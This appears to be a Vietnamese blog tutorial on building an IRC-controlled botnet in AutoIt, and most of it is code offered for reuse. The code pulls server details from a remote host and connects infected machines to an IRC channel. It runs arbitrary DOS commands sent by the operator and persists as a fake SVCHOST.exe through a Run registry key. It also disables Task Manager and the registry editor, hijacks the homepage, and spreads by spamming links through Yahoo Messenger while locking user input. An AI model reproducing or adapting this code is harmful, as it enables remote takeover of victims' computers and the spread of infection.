I/Lấy Info , kết nối với server=========================================
đầu tiên chúng ta get info từ 1 file info trên host
InetGet("http://xxx.info/server.php", @WindowsDir&"\server.txt", 1, 0)
cái ở trên là get info trong file server.php về bỏ vào file server.txt trong thư mục WiNDOWN
đây là file server.php
[Information] Server=irc.xxxx.com Port=6667 Channel=#abcd
sau đó chú ta thực hiện thủ tục lấy gán giá trị của info cho từng biến cụ thể, đặt tên nick cho zoombie luôn thể
$file = FileOpen(@WindowsDir&"\server.txt", 0)
$information = StringSplit(FileRead($file), " ")
FileClose($file)
InetGet("http://cmyip.com/", @WindowsDir&"\ip.txt", 1, 0)
$file2 = FileOpen(@WindowsDir&"\ip.txt", 0)
$get_ip = FileRead($file2)
FileClose($file2)
Global $ip = _checkIP ($get_ip)
Global $server = StringTrimLeft($information[2],7)
Global $port = StringTrimLeft($information[3],5)
Global $nick = "fshfgshgfsufuxysabcd-"&Chr(Random(65,90,1))&Chr(Random(65,90,1))&Chr(Ra ndom(65,90,1))&Chr(Random(65,90,1))&Chr(Random(65, 90,1))&Chr(Random(65,90,1))&Chr(Random(65,90,1))&C hr(Random(65,90,1))
Global $channel = StringTrimLeft($information[4],8)
Global $command
ye tới đây là xong phần chào hỏi với máy của zoombie rồi nhé!
tiếp theo là kêu gọi zoombie kết nối với server ( nói cho nó oàng tráng chứ)
cái code tí tẹo này
Global $sock = _IRCConnect($server, $port, $nick)
xong phần mở màn
II/ phần 2 chương trình điểu khiển bot
đầu tiên là đưa ra một số kiểm tra cơ bản cho việt kết nối zoombie
Local $run
local $strtmp
Local $list
$recv = TCPRecv($sock, 8192); Nhung thong tin nhan duoc tu server IRC
If @error Then $sock = _IRCConnect($server, $port, $nick) ; Neu khong ket noi dc toi server thi server do die roi.
Local $sData = StringSplit($recv, @CRLF); Phan chia tin nhan nhan dc tu server, doi khi server nhom chung lai
For $i = 1 To $sData[0] Step 1; Lam cho tin nhan ngan cach ra
Local $sTemp = StringSplit($sData[$i], " "); Phan chia tin nhan thong qua dau cach
If $sTemp[1] = "" Then ContinueLoop; Neu la rong thi tiep tuc
If $sTemp[1] = "PING" Then TCPSend($sock, "PONG " & $sTemp[2] & @CRLF); Checks for PING replys (There smaller then usual messages so its special!
If $sTemp[0] <= 2 Then ContinueLoop; Useless messages for the most part
rồi h tới phần điều khiển của master với bot tớ đưa ra vài ví dụ thôi các cậu tham khảo thêm ở source bên dưới
ví dụ đây là code của cái gơi tin nhắn đến máy zoom bai, chạy msdos, và xem processlist
$user = StringMid($sTemp[1], 2, StringInStr($sTemp[1], "!")-2)
$3 = StringMid($sData[$i], StringInStr($sData[$i], ":", 0, 2)+1)
$msg = StringSplit($3, " ")
;Msg
If $msg[1] = "msg" then
MsgBo0, "Message", StringTrimLeft($3, 4), 10)
_IRCSendMessage($sock, "OK! -Msg-", $channel)
EndIf
;Processlist
If $3 = "Processlist" then
$list=Processlist()
For $i=1 to $list[0][0]
_IRCSendMessage($sock, $list[0][0] & " " & $list[$i][1], $channel)
Next
;Msdos
$msdos=StringLeft($3,5)
If $msdos="Msdos" Then
$cmd=StringTrimLeft($3,6)
If $cmd <> "" Then
_RunDOS($cmd)
If @error Then
_IRCSendMessage($sock, "Command Error! ", $channel)
Else
_IRCSendMessage($sock, "Done! ", $channel)
EndIf
EndIf
EndIf
phần này ko quan trọng lắm vì khi đã có bot trên máy victim thì mún run code nào mà chả đc, cần thiết thì chỉ cần 1 function download and run hide là tốt rồi!
III/Phàn này mới quan trong, cơ chế lây lan, tự phục hồi, và lưu trữ
phần lưu trữ copy file SVCHOST.exe vào WINDOWN và đăng kí 1 khóa regedit để khởi động cùng windown
FileCopy(@ScriptDir & "\SVCHOST.exe","C:\WINDOWS",1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run","explorer","REG_SZ",@Win dowsDir & "\SVCHOST.exe")
cơ chế tự phục hồi thì anh em tham khảo thêm ở code vius nhé, cái này khá hay nhưng hơi phức tạp
cơ chế lây lan thì cơ bản nhất là lây qua USB và lây vào các ổ đĩa
các ban tự xem các code virus autoit đơn giản thì hầu như code nào cũng có cơ chế này, copy về mà dùng, còn các cơ chết lây qua mạng lan hay cao cấp hơn thì cố học thêm , ở đây tớ visduj code lây qua yahoo!
$website = "http://google.com.vn"
; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Micr osoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main", "Window Title", "REG_SZ", "zzzKITClubzzz")
; Danh Sach Tin Nhan Ngau Nhien
Dim $tin[10]
$tin[0] = "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " & $website & " "
$tin[1] = "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " & $website & " "
$tin[2] = "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " & $website & " "
$tin[3] = "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " & $website & " "
$tin[4] = "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & $website & " "
$tin[5] = "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " & $website & " "
$tin[6] = "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " & $website & " "
$tin[7] = "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " & $website & " "
$tin[8] = "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " & $website & " "
$tin[9] = "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? " & $website & " "
; Ham Thay Doi Status & Gui Tin Nhan
While (1)
sleep(60000)
$tieude = WinGetTitle("Yahoo! Messenger", "")
$kiemtra = WinExists ($tieude)
If $kiemtra = 1 Then
$ngaunhien = Random(0,9,1)
ClipPut($tin[$ngaunhien])
BlockInput (1)
WinActivate($tieude)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
BlockInput (0)
EndIf
Sleep(1800000)
WEnd
à và đừng quên để dòng này ở đầu source bot nhé
"#NoTrayIcon" để ko hiện icon gốc dưới màn hình
IV/các function khác
còn nhiều cái khác các bạn có thể code thêm ví dụ như code mutex ( tránh bot chạy 2 con trên 1 máy tạo ra zoombie ảo), diệt bot của đối phương ( cái này nghe zuzzovn nói, mà nghĩ nó như 1 chương trình diệt virus vậy nhỉ), code ẩn process, vv..vv nhiều lắm, nếu nắm đc căn bản thì phát triển nó ra
ở trên đây là phần minh hoạ thôi các bạn lấy hết nó về cũng ko chắc là chạy đc, nên mình đưa source gốc của tieo cho các bạn tham khảo
http://www.mediafire.com/?kmwmytg2d0i
root.vn
About thanh
0 nhận xét:
Đăng nhận xét